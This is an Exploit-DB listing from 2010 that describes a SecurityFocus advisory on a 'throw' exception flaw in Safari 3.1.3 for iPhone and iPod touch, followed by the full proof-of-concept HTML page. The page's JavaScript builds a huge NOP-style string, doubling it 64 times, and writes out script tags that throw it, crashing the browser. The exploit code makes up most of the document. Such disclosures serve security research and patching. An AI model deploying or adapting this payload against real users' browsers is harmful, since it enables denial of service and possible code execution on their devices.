Apple Safari for iPhone/iPod touch - 'Throw' Exception Remote Code Execution

EDB-ID:

33810




Platform:

OSX

Date:

2010-03-26


source: https://www.securityfocus.com/bid/38992/info

Apple Safari on iPhone and iPod touch is prone to a remote code-execution vulnerability.

Successful exploits can allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions.

Safari on Apple iPhone and iPod touch 3.1.3 is vulnerable; other versions may also be affected. 

<html> <head> <title> Bad "throw" exception Remote DoS on Safari for iPhone & iPod Touch </title> <script language="JavaScript"> var n=unescape("%u9090"); var s=unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000"); for(var i=0;i<64;i++){ n=n+n; document.write('<script>throw n+s;</scr'+'ipt>'); } </script> </head> <body> <center> <h1> Bad "throw" exception Remote DoS on Safari for iPhone & iPod Touch </h1> <h2> (C) Nishant Das Patnaik </h2> </center></body> </html>